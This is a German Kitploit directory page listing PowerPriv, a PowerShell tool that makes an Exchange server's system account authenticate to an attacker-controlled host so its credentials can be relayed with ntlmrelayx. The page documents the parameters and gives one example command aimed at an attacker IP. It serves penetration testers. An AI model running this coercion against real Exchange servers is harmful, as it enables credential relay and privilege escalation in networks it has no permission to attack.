Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
PowerPriv — Eine Powershell-Implementierung von PrivExchange, die dafür ausgelegt ist, im Kontext des aktuellen Benutzers ausgeführt zu werden. | Kitploit
Tools/GitHubGitHub/g0ldengunsec/powerpriv
Privilege EscalationExploitationLaterale BewegungPenetrationstestsAuthentifizierung
GitHubg0ldengunsec/powerpriv

PowerPriv

Eine Powershell-Implementierung von PrivExchange, die dafür ausgelegt ist, im Kontext des aktuellen Benutzers ausgeführt zu werden.

Repository anzeigen
12524vor 7 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

PowerPriv

BESCHREIBUNG

Eine PowerShell-Implementierung von PrivExchange von @_dirkjan (Originalcode hier: https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py) Nützlich für Umgebungen, in denen Sie keine Python-basierten Anwendungen ausführen können, Benutzeranmeldeinformationen haben oder keine Dateien auf die Festplatte ablegen möchten. Bewirkt, dass das Systemkonto des Ziel-Exchange-Servers versucht, sich bei einem System Ihrer Wahl zu authentifizieren.

-targetHost

Hostname oder IP der Ziel-Exchange-Box. Abhängig von der DNS-Konfiguration kann bei Verwendung des Hostnamens ein FQDN erforderlich sein. (Erforderlich)

-attackerHost

Hostname oder IP eines von Ihnen kontrollierten Systems, auf dem Sie idealerweise ntlmrelayx ausführen. Wir teilen dem Exchange-Server mit, dass er versuchen soll, sich bei diesem System zu authentifizieren. Abhängig von der DNS-Konfiguration kann bei Verwendung des Hostnamens ein FQDN erforderlich sein. (Erforderlich)

-exchangePort

Port, über den versucht wird, eine Verbindung zum Exchange-Server herzustellen. Standard ist 443.

-attackerPort

Port, über den der Exchange-Server versuchen soll, sich mit dem Angreifer zu verbinden. Standard ist 80

-attackerPage

Seite, zu der wir dem Exchange-Server mitteilen, dass er sich auf unserem Angriffssystem verbinden soll. Schrägstriche sind nicht erforderlich. Standard ist powerPriv.

-noSSL

Auf true setzen, wenn Sie für die erste Verbindung zum Exchange-Server kein https verwenden möchten. Standard ist false (https verwenden).

-Version

Version des Exchange-Servers, den wir angreifen. Standard ist 2013.

BEISPIEL

root@kitploit:~
powerPriv -targetHost corpExch01 -attackerHost 192.168.1.17 -Version 2016

HINWEISE

root@kitploit:~
Autor: @g0ldenGunSec - Basierend auf dem Tool, das von @_dirkjan erstellt wurde.
Verwenden Sie dieses Tool nur in Netzwerken, die Ihnen gehören oder für die Sie die Erlaubnis zum Testen haben.
Tool herunterladen